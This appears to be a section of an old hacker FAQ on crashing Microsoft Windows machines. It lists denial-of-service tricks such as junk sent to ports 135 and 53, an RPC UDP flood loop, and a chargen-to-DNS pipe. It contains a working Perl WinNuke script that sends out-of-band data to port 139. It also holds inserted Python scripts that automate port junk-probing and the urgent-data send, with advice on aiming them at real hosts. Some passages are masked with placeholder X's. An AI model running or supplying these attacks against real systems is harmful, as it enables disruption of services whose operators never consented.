CRASHING MICROSOFT WINDOWS
CONTENT
Microsoft TCP/IP stacks can freeze when bogus replies to their DHCP lease
requests make the lease expire prematurely.
If you telnet to port 80 on an NT machine running IIS 2.0 and issue the
command GET ..\.. the server will crash.
The Windows NT file sharing service is vulnerable to the "dot dot" bug
(.. as in the parent directory) that is well known from Windows 95,
meaning that anyone can crash the system. If someone sends a "DIR ..\"
to the workstation, a STOP message (the NT blue screen) appears on the
Windows NT computer. Note that this applies to versions 3.50 and 3.51 of
both Workstation and Server.
Telnet to port 135, send some random characters and disconnect.
This will cause the rpcss.exe process to start consuming all
available processor cycles.
Telnet to port 6558, type one letter and press enter.
Telnet to port 53, send some random characters and disconnect.
The Microsoft DNS service terminates when it receives a response
to a DNS query that was never made.
If the NT system has large file caching enabled it is easy to eat
100% of the CPU time: just transfer a large enough file to or from the
server over a shared network drive.
Also try 1031 and 1040.
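Each of the port probes above is the same motion: connect, push junk, drop the connection, then see whether the service is still there. The following Python script is an added example (not from the original text) that automates that cycle against a list of ports and afterwards checks whether each port still completes a TCP handshake. Because it has to run offline, it targets a constructed stand-in listener on 127.0.0.1 instead of a real NT host; the stub listener and the function names (send_junk, still_accepting, probe_ports) are this example's own, not anything from the page.

```python
import random
import socket
import threading


def start_stub_listener():
    """Constructed stand-in for the target service: a tiny TCP listener on
    127.0.0.1 that reads whatever arrives and drops the connection. Against
    a real target this is replaced by the NT box's own port (135, 53, ...).
    Returns (stop_event, port); set the event to shut the listener down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)  # short accept timeout so the loop can check 'stop'
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                conn.settimeout(1)
                try:
                    conn.recv(4096)  # swallow the junk, then close
                except OSError:
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return stop, srv.getsockname()[1]


def send_junk(host, port, length=512, seed=None, timeout=3.0):
    """One 'telnet to the port, type random characters, disconnect' round.
    Returns the bytes that were sent; raises OSError if the connect fails."""
    rnd = random.Random(seed)  # seeded so a run can be reproduced exactly
    junk = bytes(rnd.randrange(256) for _ in range(length))
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(junk)
    # Leaving the 'with' block closes the socket; the abrupt disconnect is
    # part of what the original text describes.
    return junk


def still_accepting(host, port, timeout=3.0):
    """Liveness check: does the port still complete a TCP handshake?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, reset or timed out
        return False


def probe_ports(host, ports, rounds=3, seed=0):
    """Run the junk/disconnect cycle 'rounds' times against each port and
    report {port: (accepting_before, accepting_after)}."""
    results = {}
    for port in ports:
        before = still_accepting(host, port)
        if before:
            for i in range(rounds):
                try:
                    send_junk(host, port, seed=seed + i)
                except OSError:
                    break  # the service went away mid-run
        results[port] = (before, still_accepting(host, port))
    return results


if __name__ == "__main__":
    stop, port = start_stub_listener()
    print(probe_ports("127.0.0.1", [port]))
    stop.set()
```

Against a real host you would pass its address and the ports listed above (135, 53, 6558, 1031, 1040) to probe_ports. Note that a handshake is only a first approximation of "alive": a service can be wedged at 100% CPU, as rpcss.exe is described to be, while the kernel still completes connections for it, so follow up with a protocol-level request where the text says the process spins rather than dies.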
Port 135 is the RPC endpoint mapper and it is used by a number
of applications. The point is that if you send UDP packets to the
port it will send UDP packets back, so we can create a loop that will
flood the network, much like the unix attack XXXXXXXXXXX
XXXXXXXXXXXXXX. Just send a packet from one NT machine's port
135 to another NT machine's port 135 on the same network.
Several (most?) programs, such as Trumpet Winsock under Windows 3.11,
cannot handle large ping packets. Also have a look at section
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
You can cause a denial of service on any Windows 95, Windows 3.11 (with
the Microsoft TCP/IP stack) or Windows NT machine running NetBIOS by
sending Out Of Band data on an established connection to the Windows
machine (send it to the NetBIOS session port, 139).
The NT machine will try to reboot, but this consumes all the memory,
both physical and virtual. Only a proper shutdown and restart fixes
the problem.
You can use the following Perl script to test the hole.
#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci
use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = $ARGV[0];
$p = $ARGV[1] || 139;            # default to the NetBIOS session port
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; exit 1; }
$in_addr = (gethostbyname($h))[4] or die "cannot resolve $h\n";
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n";
send S,"Sucker",MSG_OOB;         # the out-of-band (urgent) send is the whole attack
print "Nuked!\n"; close S;
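What the script actually puts on the wire is a TCP segment with the URG flag set: the MSG_OOB flag on send() marks the last byte of the payload as urgent. The following Python exchange is an added example, not part of the original text or of winnuke.c, that shows both ends on 127.0.0.1: a receiver that separates the ordinary bytes from the urgent byte the way a correctly behaving TCP stack delivers them, and a sender that performs the same MSG_OOB send as the Perl script. The function names, the local listener and the thread plumbing are this example's own assumptions.

```python
import select
import socket
import threading

URGENT_PAYLOAD = b"Sucker"  # the same string the Perl script sends


def listen_for_oob(ready, result):
    """Receiver side (a stand-in for the port 139 listener): accept one
    connection and read the ordinary data and the urgent byte separately."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(5)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()  # tell the sender which port to hit
    try:
        conn, _ = srv.accept()
    except socket.timeout:
        srv.close()
        return
    with conn:
        conn.settimeout(5)
        # An ordinary recv() stops at the urgent mark, so it yields every
        # byte before the single urgent byte (SO_OOBINLINE is off).
        result["normal"] = conn.recv(1024)
        # The exceptional-condition set of select() flags pending urgent
        # data; MSG_OOB then fetches that one byte out of band.
        _, _, exc = select.select([], [], [conn], 5)
        if exc:
            try:
                result["urgent"] = conn.recv(1, socket.MSG_OOB)
            except OSError as e:  # platform without OOB support
                result["error"] = str(e)
    srv.close()


def nuke(host, port, payload=URGENT_PAYLOAD):
    """Sender side: the WinNuke step, a send() with the MSG_OOB flag.
    Only the last byte of 'payload' travels as urgent data."""
    with socket.create_connection((host, port), timeout=5) as s:
        return s.send(payload, socket.MSG_OOB)


def run_exchange():
    """Run receiver and sender against each other on loopback and return
    (ordinary_bytes, urgent_byte) as seen by the receiver."""
    ready = {"event": threading.Event()}
    result = {}
    t = threading.Thread(target=listen_for_oob, args=(ready, result))
    t.start()
    ready["event"].wait(5)
    nuke("127.0.0.1", ready["port"])
    t.join(10)
    return result.get("normal"), result.get("urgent")


if __name__ == "__main__":
    normal, urgent = run_exchange()
    print("ordinary data:", normal)
    print("urgent byte:  ", urgent)
```

On a Linux loopback the receiver gets b"Sucke" as ordinary data and b"r" as the urgent byte; the Windows stacks described above fell over when handed exactly this kind of urgent data on port 139. Because only the last byte is marked urgent, the payload text is irrelevant: any byte sent with MSG_OOB produces the same URG segment, which is also why a filter looking for the string "Sucker" would catch nothing.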
To feed the DNS service on port 53 a stream of data it never asked for,
just pipe the chargen service (port 19) into it:
$ telnet ntbox 19 | telnet ntbox 53
Some configurations of some PC web servers are known to crash if you
type the IP address of the machine running the server into the web
client instead of its hostname.